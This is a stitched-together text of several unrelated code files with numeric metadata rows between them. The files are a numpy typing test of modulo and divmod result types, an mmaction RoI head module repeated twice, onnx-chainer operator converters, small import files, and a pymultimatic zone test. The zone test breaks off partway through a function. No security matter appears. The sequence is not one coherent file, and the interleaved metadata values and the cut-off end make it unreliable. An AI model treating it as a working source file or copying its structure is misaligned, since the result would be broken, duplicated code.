aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 8
|
2021-06-19T14:25:50.000Z
|
2022-03-25T02:00:29.000Z
|
# Static-typing test fixture for numpy's `%` and divmod() overloads.
# NOTE(review): each trailing `# E: <type>` comment appears to be an
# expectation compared against mypy's inferred type for that line by the
# numpy.typing test runner — do not edit those comments or reorder lines;
# full-line comments like this one are safe to add.
import numpy as np

# Scalar / array fixtures covering numpy scalar types, builtin scalars,
# and read-only arrays (bool and timedelta64 dtypes).
f8 = np.float64()
i8 = np.int64()
u8 = np.uint64()
f4 = np.float32()
i4 = np.int32()
u4 = np.uint32()
td = np.timedelta64(0, "D")
b_ = np.bool_()
b = bool()
f = float()
i = int()
AR = np.array([1], dtype=np.bool_)
AR.setflags(write=False)
AR2 = np.array([1], dtype=np.timedelta64)
AR2.setflags(write=False)
# Time structures
reveal_type(td % td)  # E: numpy.timedelta64
reveal_type(AR2 % td)  # E: Any
reveal_type(td % AR2)  # E: Any
reveal_type(divmod(td, td))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.timedelta64]
reveal_type(divmod(AR2, td))  # E: Tuple[Any, Any]
reveal_type(divmod(td, AR2))  # E: Tuple[Any, Any]
# Bool
reveal_type(b_ % b)  # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ % i)  # E: numpy.signedinteger[Any]
reveal_type(b_ % f)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % b_)  # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ % i8)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(b_ % u8)  # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % AR)  # E: Any
reveal_type(divmod(b_, b))  # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(b_, i))  # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(b_, f))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, b_))  # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(b_, i8))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(b_, u8))  # E: Tuple[numpy.unsignedinteger[numpy.typing._64Bit], numpy.unsignedinteger[numpy.typing._64Bit]]
reveal_type(divmod(b_, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, AR))  # E: Tuple[Any, Any]
reveal_type(b % b_)  # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(i % b_)  # E: numpy.signedinteger[Any]
reveal_type(f % b_)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ % b_)  # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(i8 % b_)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 % b_)  # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(f8 % b_)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(AR % b_)  # E: Any
reveal_type(divmod(b, b_))  # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(i, b_))  # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(f, b_))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(b_, b_))  # E: Tuple[numpy.signedinteger[numpy.typing._8Bit], numpy.signedinteger[numpy.typing._8Bit]]
reveal_type(divmod(i8, b_))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(u8, b_))  # E: Tuple[numpy.unsignedinteger[numpy.typing._64Bit], numpy.unsignedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f8, b_))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(AR, b_))  # E: Tuple[Any, Any]
# int
reveal_type(i8 % b)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 % i)  # E: numpy.signedinteger[Any]
reveal_type(i8 % f)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i8)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i8)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i4 % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i4)  # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 % f4)  # E: numpy.floating[numpy.typing._32Bit]
reveal_type(i8 % AR)  # E: Any
reveal_type(divmod(i8, b))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, i))  # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(i8, f))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i8))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i4))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i8, f4))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i4))  # E: Tuple[numpy.signedinteger[numpy.typing._32Bit], numpy.signedinteger[numpy.typing._32Bit]]
reveal_type(divmod(i4, f4))  # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(i8, AR))  # E: Tuple[Any, Any]
reveal_type(b % i8)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i % i8)  # E: numpy.signedinteger[Any]
reveal_type(f % i8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i8)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(f8 % i8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % i4)  # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(f8 % i4)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 % i4)  # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(f4 % i4)  # E: numpy.floating[numpy.typing._32Bit]
reveal_type(AR % i8)  # E: Any
reveal_type(divmod(b, i8))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(i, i8))  # E: Tuple[numpy.signedinteger[Any], numpy.signedinteger[Any]]
reveal_type(divmod(f, i8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i8, i8))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f8, i8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i8))  # E: Tuple[numpy.signedinteger[numpy.typing._64Bit], numpy.signedinteger[numpy.typing._64Bit]]
reveal_type(divmod(f4, i8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i4, i4))  # E: Tuple[numpy.signedinteger[numpy.typing._32Bit], numpy.signedinteger[numpy.typing._32Bit]]
reveal_type(divmod(f4, i4))  # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(AR, i8))  # E: Tuple[Any, Any]
# float
reveal_type(f8 % b)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % i)  # E: numpy.floating[Any]
reveal_type(f8 % f)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 % f4)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 % f4)  # E: numpy.floating[numpy.typing._32Bit]
reveal_type(f8 % AR)  # E: Any
reveal_type(divmod(f8, b))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, i))  # E: Tuple[numpy.floating[Any], numpy.floating[Any]]
reveal_type(divmod(f8, f))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f4))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f4))  # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(f8, AR))  # E: Tuple[Any, Any]
reveal_type(b % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i % f8)  # E: numpy.floating[Any]
reveal_type(f % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 % f8)  # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 % f4)  # E: numpy.floating[numpy.typing._32Bit]
reveal_type(AR % f8)  # E: Any
reveal_type(divmod(b, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(i, f8))  # E: Tuple[numpy.floating[Any], numpy.floating[Any]]
reveal_type(divmod(f, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f8, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f8))  # E: Tuple[numpy.floating[numpy.typing._64Bit], numpy.floating[numpy.typing._64Bit]]
reveal_type(divmod(f4, f4))  # E: Tuple[numpy.floating[numpy.typing._32Bit], numpy.floating[numpy.typing._32Bit]]
reveal_type(divmod(AR, f8))  # E: Tuple[Any, Any]
| 59.253333
| 127
| 0.740549
| 1,346
| 8,888
| 4.698366
| 0.036404
| 0.198292
| 0.212524
| 0.246679
| 0.935484
| 0.924257
| 0.906705
| 0.884409
| 0.85895
| 0.828748
| 0
| 0.045218
| 0.091809
| 8,888
| 149
| 128
| 59.651007
| 0.738231
| 0.637939
| 0
| 0.165289
| 0
| 0
| 0.000322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008264
| 0
| 0.008264
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
670c7ad02d36c2d2928ff79b798f4ab44c86495d
| 7,518
|
py
|
Python
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 9
|
2021-05-20T16:34:00.000Z
|
2022-02-10T04:22:38.000Z
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 1
|
2022-01-09T09:55:06.000Z
|
2022-01-09T09:55:06.000Z
|
mmaction/models/heads/roi_head.py
|
why-know/YF-OpenLib-mmaction2
|
355dc5c715796945ec75de2123be2f1a5ae694c7
|
[
"Apache-2.0"
] | 1
|
2022-01-11T08:29:01.000Z
|
2022-01-11T08:29:01.000Z
|
import numpy as np
import torch
from mmaction.core.bbox import bbox2result
from mmaction.utils import import_module_error_class
# mmdet is an optional dependency: probe for it once at import time and
# record the result so the real RoI head below is only defined (and
# registered) when mmdet is actually installed.
try:
    from mmdet.core.bbox import bbox2roi
    from mmdet.models import HEADS as MMDET_HEADS
    from mmdet.models.roi_heads import StandardRoIHead
    mmdet_imported = True
except (ImportError, ModuleNotFoundError):
    mmdet_imported = False
if mmdet_imported:
    @MMDET_HEADS.register_module()
    class AVARoIHead(StandardRoIHead):
        """RoI head for AVA-style action detection on top of mmdet's
        StandardRoIHead; registered with mmdet's HEADS registry."""

        def _bbox_forward(self, x, rois):
            """Run the bbox feature extractor and head on the given RoIs.

            Returns a dict with 'cls_score', 'bbox_pred' and 'bbox_feats'.
            """
            # RoIs may arrive as another dtype; the extractor expects float.
            rois = rois.float()
            bbox_feat = self.bbox_roi_extractor(x, rois)
            if self.with_shared_head:
                bbox_feat = self.shared_head(bbox_feat)
            cls_score, bbox_pred = self.bbox_head(bbox_feat)
            bbox_results = dict(
                cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feat)
            return bbox_results

        def simple_test(self,
                        x,
                        proposal_list,
                        img_metas,
                        proposals=None,
                        rescale=False):
            """Single-sample, no-augmentation test: detect boxes and format
            the results per class via bbox2result."""
            assert self.with_bbox, 'Bbox head must be implemented.'
            if isinstance(x, tuple):
                x_shape = x[0].shape
            else:
                x_shape = x.shape
            # Test mode only supports batch size 1.
            assert x_shape[0] == 1, 'only accept 1 sample at test mode'
            assert x_shape[0] == len(img_metas) == len(proposal_list)
            det_bboxes, det_labels = self.simple_test_bboxes(
                x, img_metas, proposal_list, self.test_cfg, rescale=rescale)
            bbox_results = bbox2result(
                det_bboxes,
                det_labels,
                self.bbox_head.num_classes,
                thr=self.test_cfg.action_thr)
            return [bbox_results]

        def simple_test_bboxes(self,
                               x,
                               img_metas,
                               proposals,
                               rcnn_test_cfg,
                               rescale=False):
            """Test only det bboxes without augmentation."""
            # NOTE(review): `rescale` is accepted but not used in this body —
            # confirm whether rescaling is intentionally unsupported here.
            rois = bbox2roi(proposals)
            bbox_results = self._bbox_forward(x, rois)
            cls_score = bbox_results['cls_score']
            img_shape = img_metas[0]['img_shape']
            # Defaults: full-frame crop, no flip, unless img_metas says otherwise.
            crop_quadruple = np.array([0, 0, 1, 1])
            flip = False
            if 'crop_quadruple' in img_metas[0]:
                crop_quadruple = img_metas[0]['crop_quadruple']
            if 'flip' in img_metas[0]:
                flip = img_metas[0]['flip']
            det_bboxes, det_labels = self.bbox_head.get_det_bboxes(
                rois,
                cls_score,
                img_shape,
                flip=flip,
                crop_quadruple=crop_quadruple,
                cfg=rcnn_test_cfg)
            return det_bboxes, det_labels
else:
    # Just define an empty class, so that __init__ can import it.
    @import_module_error_class('mmdet')
    class AVARoIHead:
        pass
import numpy as np
import torch
from mmaction.core.bbox import bbox2result
from mmaction.utils import import_module_error_class
# NOTE(review): this feature-detection block (and the class below) repeats
# the top of the file almost verbatim — the file looks like two copies
# concatenated, differing only in the class name (AVARoIHead vs
# Via3RoIHead) and the bbox2result handling. Consider de-duplicating, e.g.
# via a shared base class.
try:
    from mmdet.core.bbox import bbox2roi
    from mmdet.models import HEADS as MMDET_HEADS
    from mmdet.models.roi_heads import StandardRoIHead
    mmdet_imported = True
except (ImportError, ModuleNotFoundError):
    mmdet_imported = False
if mmdet_imported:
    @MMDET_HEADS.register_module()
    class Via3RoIHead(StandardRoIHead):
        """RoI head variant that formats multilabel detections with its own
        bbox2result override; registered with mmdet's HEADS registry."""

        def _bbox_forward(self, x, rois):
            """Run the bbox feature extractor and head on the given RoIs.

            Returns a dict with 'cls_score', 'bbox_pred' and 'bbox_feats'.
            """
            # RoIs may arrive as another dtype; the extractor expects float.
            rois = rois.float()
            bbox_feat = self.bbox_roi_extractor(x, rois)
            if self.with_shared_head:
                bbox_feat = self.shared_head(bbox_feat)
            cls_score, bbox_pred = self.bbox_head(bbox_feat)
            bbox_results = dict(
                cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feat)
            return bbox_results

        def bbox2result(self, bboxes, labels, num_classes, thr=0.01):
            """Convert detection results to a list of numpy arrays.
            Args:
                bboxes (Tensor): shape (n, 4)
                labels (Tensor): shape (n, #num_classes)
                num_classes (int): class number, including background class
                thr (float): The score threshold used when converting predictions to
                    detection results
            Returns:
                list(ndarray): bbox results of each class
            """
            if bboxes.shape[0] == 0:
                # No detections: one empty (0, 5) array per foreground class.
                return list(np.zeros((num_classes - 1, 0, 5), dtype=np.float32))
            else:
                bboxes = bboxes.cpu().numpy()
                labels = labels.cpu().numpy()
                # We only handle multilabel now
                assert labels.shape[-1] > 1
                scores = labels  # rename for clarification
                # A scalar threshold is broadcast to one threshold per class.
                thr = (thr,) * num_classes if isinstance(thr, float) else thr
                assert scores.shape[1] == num_classes
                assert len(thr) == num_classes
                result = []
                for i in range(num_classes):
                    # Keep boxes whose score for class i clears the threshold;
                    # each row is [x1, y1, x2, y2, score].
                    where = scores[:, i] > thr[i]
                    result.append(
                        np.concatenate((bboxes[where, :4], scores[where, i:i + 1]),
                                       axis=1))
                return result

        def simple_test(self,
                        x,
                        proposal_list,
                        img_metas,
                        proposals=None,
                        rescale=False):
            """Single-sample, no-augmentation test: detect boxes and format
            the results per class via this head's own bbox2result."""
            assert self.with_bbox, 'Bbox head must be implemented.'
            if isinstance(x, tuple):
                x_shape = x[0].shape
            else:
                x_shape = x.shape
            # Test mode only supports batch size 1.
            assert x_shape[0] == 1, 'only accept 1 sample at test mode'
            assert x_shape[0] == len(img_metas) == len(proposal_list)
            det_bboxes, det_labels = self.simple_test_bboxes(
                x, img_metas, proposal_list, self.test_cfg, rescale=rescale)
            bbox_results = self.bbox2result(
                det_bboxes,
                det_labels,
                self.bbox_head.num_classes,
                thr=self.test_cfg.action_thr)
            return [bbox_results]

        def simple_test_bboxes(self,
                               x,
                               img_metas,
                               proposals,
                               rcnn_test_cfg,
                               rescale=False):
            """Test only det bboxes without augmentation."""
            # NOTE(review): `rescale` is accepted but not used in this body —
            # confirm whether rescaling is intentionally unsupported here.
            rois = bbox2roi(proposals)
            bbox_results = self._bbox_forward(x, rois)
            cls_score = bbox_results['cls_score']
            img_shape = img_metas[0]['img_shape']
            # Defaults: full-frame crop, no flip, unless img_metas says otherwise.
            crop_quadruple = np.array([0, 0, 1, 1])
            flip = False
            if 'crop_quadruple' in img_metas[0]:
                crop_quadruple = img_metas[0]['crop_quadruple']
            if 'flip' in img_metas[0]:
                flip = img_metas[0]['flip']
            det_bboxes, det_labels = self.bbox_head.get_det_bboxes(
                rois,
                cls_score,
                img_shape,
                flip=flip,
                crop_quadruple=crop_quadruple,
                cfg=rcnn_test_cfg)
            return det_bboxes, det_labels
else:
    # Just define an empty class, so that __init__ can import it.
    @import_module_error_class('mmdet')
    class Via3RoIHead:
        pass
| 35.462264
| 84
| 0.539106
| 834
| 7,518
| 4.61271
| 0.173861
| 0.037432
| 0.023395
| 0.037432
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0.808682
| 0
| 0.012111
| 0.384943
| 7,518
| 211
| 85
| 35.630332
| 0.819853
| 0.082203
| 0
| 0.858025
| 0
| 0
| 0.036031
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.04321
| false
| 0.012346
| 0.148148
| 0
| 0.265432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
671c4f479d7f97afec654ab4fa4bf48e53c5da56
| 2,822
|
py
|
Python
|
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
onnx_chainer/functions/math/basic_math.py
|
Hakuyume/onnx-chainer
|
3c46bd692ef38a7c0f45a2a09795d2023364e12b
|
[
"MIT"
] | null | null | null |
import numpy as np
from onnx import helper
from onnx import numpy_helper
from onnx_chainer import mapping
import os
def convert_unary_operator(
        func, input_names, param_names, parameters, input_tensors):
    """Build the ONNX node for a unary Chainer math function.

    Non-string entries of ``input_names`` are stringified in place, the
    ONNX op type is looked up from the function's class name, and a
    one-element tuple containing the node is returned.
    """
    for idx, name in enumerate(input_names):
        if type(name) is not str:
            input_names[idx] = str(name)
    op_type = mapping.operators[func.__class__.__name__]
    output_names = [str(id(o())) for o in func.outputs]
    return helper.make_node(op_type, input_names, output_names),
def convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors):
    """Build the ONNX node for a binary Chainer math function.

    Mirrors convert_unary_operator: input names are stringified in place,
    the op type comes from ``mapping.operators`` keyed by the function's
    class name, and the node is returned as a one-element tuple.
    """
    for position in range(len(input_names)):
        current = input_names[position]
        if type(current) is not str:
            input_names[position] = str(current)
    onnx_op = mapping.operators[func.__class__.__name__]
    outs = [str(id(out())) for out in func.outputs]
    return helper.make_node(onnx_op, input_names, outs),
def convert_Add(func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Add function node to its ONNX node (binary op)."""
    return convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_Sub(func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Sub function node to its ONNX node (binary op)."""
    return convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_Mul(func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Mul function node to its ONNX node (binary op)."""
    return convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_Neg(func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Neg function node to its ONNX node.

    Neg is a unary operator, so delegate to the unary converter.
    (Previously this called convert_binary_operator; the two converters
    currently have identical bodies, so behavior is unchanged, but the
    unary converter is the semantically correct delegate — cf.
    convert_Absolute.)
    """
    return convert_unary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_Div(func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Div function node to its ONNX node (binary op)."""
    return convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_Absolute(
        func, input_names, param_names, parameters, input_tensors):
    """Convert a Chainer Absolute function node to its ONNX node (unary op)."""
    return convert_unary_operator(
        func, input_names, param_names, parameters, input_tensors)
def convert_PowVarConst(
        func, input_names, param_names, parameters, input_tensors):
    """Convert PowVarConst (variable ** constant) into an ONNX Pow node.

    The scalar exponent is materialized as a named initializer: it is
    appended to ``parameters`` and ``input_tensors``, registered in
    ``param_names``, and added as an extra input name before delegating to
    the binary converter.
    """
    node_name = 'Pow_{}'.format(str(id(func.value)))
    exponent = np.asarray(
        [func.value], dtype=func.inputs[0].get_variable().dtype)
    tensor_name = os.path.join(node_name, 'value')
    param_names[id(func.value)] = tensor_name
    parameters.append(numpy_helper.from_array(exponent, tensor_name))
    input_tensors.append(
        helper.make_tensor_value_info(
            tensor_name, mapping.dtypes[exponent.dtype], exponent.shape))
    input_names.append(tensor_name)
    return convert_binary_operator(
        func, input_names, param_names, parameters, input_tensors)
| 32.068182
| 79
| 0.718285
| 371
| 2,822
| 5.118598
| 0.172507
| 0.121116
| 0.117957
| 0.160084
| 0.801474
| 0.757241
| 0.757241
| 0.757241
| 0.733017
| 0.733017
| 0
| 0.000439
| 0.192062
| 2,822
| 87
| 80
| 32.436782
| 0.832456
| 0
| 0
| 0.47541
| 0
| 0
| 0.003898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147541
| false
| 0
| 0.081967
| 0.098361
| 0.377049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
679b067c6e149259e77b4979e94286af5fd19288
| 187
|
py
|
Python
|
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | null | null | null |
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | 27
|
2021-12-14T07:10:23.000Z
|
2022-02-28T10:04:26.000Z
|
services/plc_connector/json_converter/py/messages/__init__.py
|
koorya/machine_scripting
|
01e5474a8131e7c81266b9bc21f7400a45c808fc
|
[
"MIT"
] | null | null | null |
from ..messages.cnn_task import CNNTask
from ..messages.cnn_answer import CNNAnswer
from ..messages.service_task import ServiceTask
from ..messages.service_response import ServiceResponse
| 46.75
| 55
| 0.855615
| 24
| 187
| 6.5
| 0.5
| 0.307692
| 0.192308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080214
| 187
| 4
| 55
| 46.75
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
67a8d8154cab0921e50e8c8ef217dc3f3e9a5d14
| 70
|
py
|
Python
|
src/test.py
|
Shreejan-35/VAULTERPY
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | 2
|
2022-03-27T21:56:18.000Z
|
2022-03-30T09:06:29.000Z
|
src/test.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
src/test.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
from vaulter_py import *
from vaulter_py.passvault import main

# Run the vault entry point only when executed as a script; importing this
# module no longer triggers it as a side effect.
if __name__ == "__main__":
    main()
| 17.5
| 37
| 0.814286
| 11
| 70
| 5
| 0.545455
| 0.4
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 70
| 4
| 38
| 17.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
67e17881015281b2b0e5610621f45ebfa08a5360
| 3,758
|
py
|
Python
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 30
|
2019-12-01T16:04:11.000Z
|
2022-02-28T09:23:52.000Z
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 43
|
2019-11-09T18:55:10.000Z
|
2022-02-25T20:05:55.000Z
|
tests/test_zone.py
|
oliverpell/pymultiMATIC
|
f4029bdd7d043b9d9f6411da13596535c89c077b
|
[
"MIT"
] | 7
|
2020-08-03T08:44:18.000Z
|
2022-02-27T10:15:46.000Z
|
import unittest
from pymultimatic.model import ActiveFunction, OperatingModes, SettingModes, Zone, ZoneCooling
from tests.conftest import _time_program, _zone, _zone_cooling
class ZoneTest(unittest.TestCase):
    def test_get_active_mode_night(self) -> None:
        """NIGHT heating mode reports NIGHT, the low target, and no sub-mode."""
        zone = _zone()
        zone.heating.operating_mode = OperatingModes.NIGHT
        active_mode = zone.active_mode
        self.assertEqual(OperatingModes.NIGHT, active_mode.current)
        self.assertEqual(zone.heating.target_low, active_mode.target)
        self.assertIsNone(active_mode.sub)
    def test_get_active_mode_day(self) -> None:
        """DAY heating mode reports DAY, the high target, and no sub-mode."""
        zone = _zone()
        zone.heating.operating_mode = OperatingModes.DAY
        active_mode = zone.active_mode
        self.assertEqual(OperatingModes.DAY, active_mode.current)
        self.assertEqual(zone.heating.target_high, active_mode.target)
        self.assertIsNone(active_mode.sub)
    def test_get_active_mode_off(self) -> None:
        """OFF heating mode reports OFF with the minimum heating target."""
        zone = _zone()
        zone.heating.operating_mode = OperatingModes.OFF
        active_mode = zone.active_mode
        self.assertEqual(OperatingModes.OFF, active_mode.current)
        self.assertEqual(Zone.MIN_TARGET_HEATING_TEMP, active_mode.target)
        self.assertIsNone(active_mode.sub)
def test_cooling_active_mode_auto(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.AUTO
cooling.time_program = _time_program()
active_mode = cooling.active_mode
